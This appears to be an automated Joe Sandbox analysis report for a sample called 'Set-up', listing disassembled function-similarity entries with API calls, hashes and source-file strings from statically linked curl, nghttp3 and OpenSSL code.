                                      • String ID: copy_integer$crypto/params.c$general_get_uint
                                      • API String ID: 1297977491-1187682564
                                      • Opcode ID: 01361db483d80eef3788afd9ac345d4f5a74efd9cdf3fdcebd7a64690d5abe1d
                                      • Instruction ID: 9fdeead67cfbe8da7215d1fcb6002582a65bc63635bd0236b20e0190539d1916
                                      • Opcode Fuzzy Hash: 01361db483d80eef3788afd9ac345d4f5a74efd9cdf3fdcebd7a64690d5abe1d
                                      • Instruction Fuzzy Hash: C8215776B442067BD5307168AC17F7F6747CBC5B24F2C006DFB0CAA2C3E999A80149A9
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,006F2BF4,00000008), ref: 006F22C1
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,006F2BF4,00000008), ref: 006F2312
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: copy_integer$crypto/params.c$general_set_uint
                                      • API String ID: 1297977491-3191580373
                                      • Opcode ID: 532e184c7f6f6e6f740c48f0be9b9dbed628470f62650938b411d54df0ce0b39
                                      • Instruction ID: 24776607d375be556d240a0ca0cc86030f6b7cd88ef380f756907b607cd72c71
                                      • Opcode Fuzzy Hash: 532e184c7f6f6e6f740c48f0be9b9dbed628470f62650938b411d54df0ce0b39
                                      • Instruction Fuzzy Hash: E021B1B17083062BDB34A5649C66F7A778BE7D1704F18002DF649C63C3D599EE414E61
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F40C1
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F411E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strcpystrlen$memcpymemset
                                      • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                                      • API String ID: 2323844366-3781254518
                                      • Opcode ID: 00beb5985515e344961c28e4961962326f82f89667f70c5c7da7abdfd3c86628
                                      • Instruction ID: 85fc4f2f2532ef9a77d6a5ca1fc8695579eefe8f83602513f9eb2c95c8d17da9
                                      • Opcode Fuzzy Hash: 00beb5985515e344961c28e4961962326f82f89667f70c5c7da7abdfd3c86628
                                      • Instruction Fuzzy Hash: 0A012D61B4435136D63072646C07F7B2B4ACBD1B14F1C047DF748E65C3EDD9684542A6
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00B1811C,nghttp3_qpack.c,00000811,?,?), ref: 005BE866
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,005C077F,?,?,00000000,00000000), ref: 005BE87B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
                                      • API String ID: 1222420520-1270044496
                                      • Opcode ID: 6378582c8475a2a82ac3fce9fa81cc071a2d00e761db4fa523ac5d4c9f6a6458
                                      • Instruction ID: 55209365c71caca2af419b7f1dcd0231c51939f630ce7f4fb05cf1d2fb4164ec
                                      • Opcode Fuzzy Hash: 6378582c8475a2a82ac3fce9fa81cc071a2d00e761db4fa523ac5d4c9f6a6458
                                      • Instruction Fuzzy Hash: 2F81B375A00A029FD710DF24D846AA6BBF5FF89314F08462CF84A87752EB31F895CB91
                                      APIs
                                      • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(005154E6), ref: 00518235
                                      • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 005182D4
                                      • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 005182E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strrchr$_stat64
                                      • String ID: mime.c
                                      • API String ID: 2771713950-3378952128
                                      • Opcode ID: 77f9c46432076238ca1407f1e54548d4fb478ed24efa0bb46575a8e9aba20c9e
                                      • Instruction ID: f06db37fc4804c845a548eebdc4e185a02d41cf8c3c3c36cc7ac414ab1e96a72
                                      • Opcode Fuzzy Hash: 77f9c46432076238ca1407f1e54548d4fb478ed24efa0bb46575a8e9aba20c9e
                                      • Instruction Fuzzy Hash: F251E7B1A007019BFB249F28CC867B73EA4BF44750F184668FD289F2C6EB75C9848791
                                      APIs
                                      • htons.WS2_32(?), ref: 005543D8
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00554409
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00554457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: htonsmemcpystrlen
                                      • String ID: curl_addrinfo.c
                                      • API String ID: 2973076469-1838508774
                                      • Opcode ID: 773a571cc794f1e171e16aaa094bed60da0a12febf3e11000e2cc5588c4a2d90
                                      • Instruction ID: 79066444917936ca5c8d2f3d1b6c7e55c782b8c7068df23466236198a742b66b
                                      • Opcode Fuzzy Hash: 773a571cc794f1e171e16aaa094bed60da0a12febf3e11000e2cc5588c4a2d90
                                      • Instruction Fuzzy Hash: 40415CB5A04705AFDB10DF58C481A6ABBE4FF88314F04892EFD898B351E371E994CB91
                                      APIs
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0054665D
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0054670E
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0054671C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$_time64
                                      • String ID: altsvc.c
                                      • API String ID: 2413861649-3234676706
                                      • Opcode ID: 3ad8ea507e75f85fe264d52aeb01bfd2c2956f1e44a86844af4ef14fb4ac67d3
                                      • Instruction ID: 36ec8e4f4beebc208fdf47d992d75c89c0ff28c66e925e6afbeda3f694d2ee07
                                      • Opcode Fuzzy Hash: 3ad8ea507e75f85fe264d52aeb01bfd2c2956f1e44a86844af4ef14fb4ac67d3
                                      • Instruction Fuzzy Hash: 0031F9B5A043056BDB10EE24AC86AAB3FE4BB95758F084838FD0D96252F631DD44D693
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 005B435F
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 005B43EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                      • API String ID: 1222420520-4133914617
                                      • Opcode ID: 9b4a98e476090215557f8942c01bf285fde5803b3d550ff592d75b37f47ecc6a
                                      • Instruction ID: f0d147b4e03afeb4f3cc79d5adb57dd29e5d35963a11369b448c7844453b1bc5
                                      • Opcode Fuzzy Hash: 9b4a98e476090215557f8942c01bf285fde5803b3d550ff592d75b37f47ecc6a
                                      • Instruction Fuzzy Hash: 7E318E72500245AFD7119F54EC09FDA3BE9BF85319F0908B8E9049B163E736E5688B61
                                      APIs
                                      • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,005B70DF,00000001,?,?,?), ref: 005BA0E5
                                        • Part of subcall function 005BA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 005BA29A
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,005B70DF,00000001,?,?,?), ref: 005BA135
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assertmemcpymemmove
                                      • String ID: ksl->head$nghttp3_ksl.c
                                      • API String ID: 374949274-2784241221
                                      • Opcode ID: f3ebb203d590cb9acd1b158124bd23080d1eed51d3c06588cf80583f185dde9f
                                      • Instruction ID: 7dd33427855e45e548c08ef2a378267a284842f9d6b03e9d32978ef9ab940ca0
                                      • Opcode Fuzzy Hash: f3ebb203d590cb9acd1b158124bd23080d1eed51d3c06588cf80583f185dde9f
                                      • Instruction Fuzzy Hash: E31193702002019FDB149F18D885A9AFBB6FF89304F18D55EF9098B642D734EC85CBA2
                                      APIs
                                      • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0054893B
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00548960
                                        • Part of subcall function 00537620: GetModuleHandleA.KERNEL32(ntdll), ref: 0053763F
                                        • Part of subcall function 00537620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 0053764B
                                        • Part of subcall function 00537620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00537695
                                        • Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 005376D3
                                        • Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 005376DA
                                        • Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 005376E4
                                        • Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 005376EB
                                        • Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 005376FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
                                      • String ID: @$ @
                                      • API String ID: 2103437208-1089145642
                                      • Opcode ID: 428a8ab63c26888c6ae4a685523364bd8232010b5d8c19a6c4bd4cdb356551c8
                                      • Instruction ID: 4d19cef34b77facd38f2adc737ac4b71af872a43cfd35d27aad966e8a80c87de
                                      • Opcode Fuzzy Hash: 428a8ab63c26888c6ae4a685523364bd8232010b5d8c19a6c4bd4cdb356551c8
                                      • Instruction Fuzzy Hash: 7B01C0B05087429BE710AF14ED4E7BE7BE4BF41318F010828EA845A291E7B59988C642
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00638A9A
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00638AEA
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00638BD7
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00638C2B
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00638E63
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID:
                                      • API String ID: 3510742995-0
                                      • Opcode ID: 751fe6b8f153e2c873314a8a2acb9f677612fc171bcee49430c66cab69ee0bbb
                                      • Instruction ID: 2e37309369dfd4cef1d4faf63f8c3d36f9afd088ee93710dafda4c255bcca6ae
                                      • Opcode Fuzzy Hash: 751fe6b8f153e2c873314a8a2acb9f677612fc171bcee49430c66cab69ee0bbb
                                      • Instruction Fuzzy Hash: 89F19BB1A017128FDB18CF18C59079ABBA2FF95310F18C56DE84A8B396DB35E845CBD0
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0053C685
                                        • Part of subcall function 005173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0051CA95,00AF6A38,00000467,mprintf.c), ref: 0051741D
                                        • Part of subcall function 005173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00517445
                                        • Part of subcall function 005173F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0051CA95,00AF6A38,00000467,mprintf.c), ref: 00517486
                                        • Part of subcall function 005173F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005174AA
                                        • Part of subcall function 005173F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 005174B2
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0053C6CF
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0053C719
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
